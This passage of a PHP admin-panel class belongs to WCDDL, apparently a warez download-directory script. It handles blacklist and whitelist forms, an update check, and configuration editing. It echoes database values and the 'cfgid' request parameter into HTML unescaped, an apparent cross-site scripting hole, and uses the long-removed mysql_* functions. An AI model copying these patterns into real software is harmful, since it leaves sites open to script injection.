$bwform .= '<tr><td><a href="http://'.$row['url'].'" target="_blank">'.$row['url'].'</a></td><td align="right"><input type="checkbox" name="remove[]" value="'.$row['url'].'"></td></tr>';
}
$bwform .= '<tr><td colspan="2" align="right"><input type="submit" value="Remove Selected" name="bwsub"></td></tr>
</table></form><br>
<form action="" method="post"><table width="100%">
<tr><td align="center">'.ucfirst($this->blackorwhite).'list an URL</td></tr>
<tr><td align="center">DO NOT INCLUDE WWW., HTTP:// or a directory! ONLY THE HOST NAME<br><input type="text" name="bwurl"></td></tr>
<tr><td align="center"><input type="submit" value="'.ucfirst($this->blackorwhite).'list" name="bwsub"></td></tr></table></form>';
$bwform = $this->processDataHook('bwlistForm',$bwform);
echo $bwform;
}
protected function admin_whitelist() {
$this->admin_blacklist();
}
protected function admin_update() {
echo 'Current Version: '.$this->version.'<br /><br />';
$latest = @file_get_contents("http://warezcoders.com/wcddl_latest.txt");
echo 'Latest Version: '.(!empty($latest) ? $latest : 'Unknown').'<br /><br />';
if($this->version != $latest) {
echo 'You do not have the latest version, <a href="http://warezcoders.com">Update Here</a>.';
}
}
protected function admin_addcfg() {
if(isset($_POST['cfgname'],$_POST['cfgvalue'],$_POST['cfggroup'])) {
$name = $_POST['cfgname'];
$val = $_POST['cfgvalue'];
$group = $_POST['cfggroup'];
}
if(isset($name) && isset($val) && isset($group)) {
$this->changeCFG($name,$val,$group);
echo 'Setting Added/Changed!';
}
echo '<form action="" method="post"><table width="100%">
<tr><td colspan="2">Add a Configuration Setting</td></tr>
<tr><td colspan="2">IMPORTANT: If you attempt to add an already existing config, it will be overwritten!</td></tr>
<tr><td>Name:</td><td><input type="text" name="cfgname"></td></tr>
<tr><td>Group:</td><td><input type="text" name="cfggroup" value="misc"></td></tr>
<tr><td>Value:</td><td><textarea cols="30" rows="5" name="cfgvalue"></textarea></td></tr>
<tr><td> </td><td><input type="submit" value="Add"></td></tr>
</table></form>';
}
protected function admin_manage_config() {
if(isset($_POST['group']))
$group = $_POST['group'];
if(isset($_REQUEST['cfgid']))
$cfg_id = $_REQUEST['cfgid'];
if(!isset($group) && !isset($cfg_id)) {
echo '<form action="" method="post"><table width="100%">
<tr><td colspan="2">Select a Config Group</td></tr>
<tr><td>Group:</td><td><select name="group">';
$groups = mysql_query("SELECT DISTINCT config_group FROM wcddl_config");
while($group_name = mysql_fetch_row($groups))
echo '<option value="'.$group_name[0].'">'.$group_name[0].'</option>';
echo '</select></td></tr>
<tr><td colspan="2"><input type="submit" value="Select"></td></tr>
</table></form>';
} elseif(isset($group)) {
echo '<form action="" method="post"><table width="100%">
<tr><td colspan="2">Select a Configuration</td></tr>
<tr><td>Config:</td><td><select name="cfgid">';
$cfgs = mysql_query("SELECT config_name FROM wcddl_config WHERE config_group = '".mysql_real_escape_string($group)."'");
while($cfg_name = mysql_fetch_row($cfgs))
echo '<option value="'.$cfg_name[0].'">'.$cfg_name[0].'</option>';
echo '</select></td></tr>
<tr><td colspan="2"><input type="submit" value="Edit"></td></tr>
</table></form>';
} elseif(isset($cfg_id)) {
if(isset($_POST['newval']))
$newval = $_POST['newval'];
if(!isset($newval)) {
$val = $this->fetchCFG($cfg_id);
echo '<form action="?go=manage_config&cfgid='.$cfg_id.'" method="post"><table width="100%">
<tr><td colspan="2">Enter a new value</td></tr>
<tr><td>Value:</td><td><input type="text" name="newval" value="'.$val.'"></td></tr>
<tr><td colspan="2"><input type="submit" value="Save"></td></tr>
</table></form>';
} else {
$this->changeCFG($cfg_id,$newval);
echo 'Configuration Set.';
}
}
}
protected function admin_list_mods() {
echo '<table width="100%">';
if($dir = opendir($this->sitepath."modules/")) {
while(($file = readdir($dir)) !== false) {
if(substr($file,0,6) == "wcddl_") {
echo '<tr><td>'.$file.'</td><td>';
$filecontents = file_get_contents($this->sitepath."modules/".$file);
if(preg_match_all("#/\*BEGIN_INFO([\s\S]*?)END_INFO\*/#",$filecontents,$info))
echo nl2br(trim(strip_tags($info[1][0])));
else
echo 'No Info.';
echo '</td></tr>';
}
}
closedir($dir);
}
echo '</table>';
}
}
?>
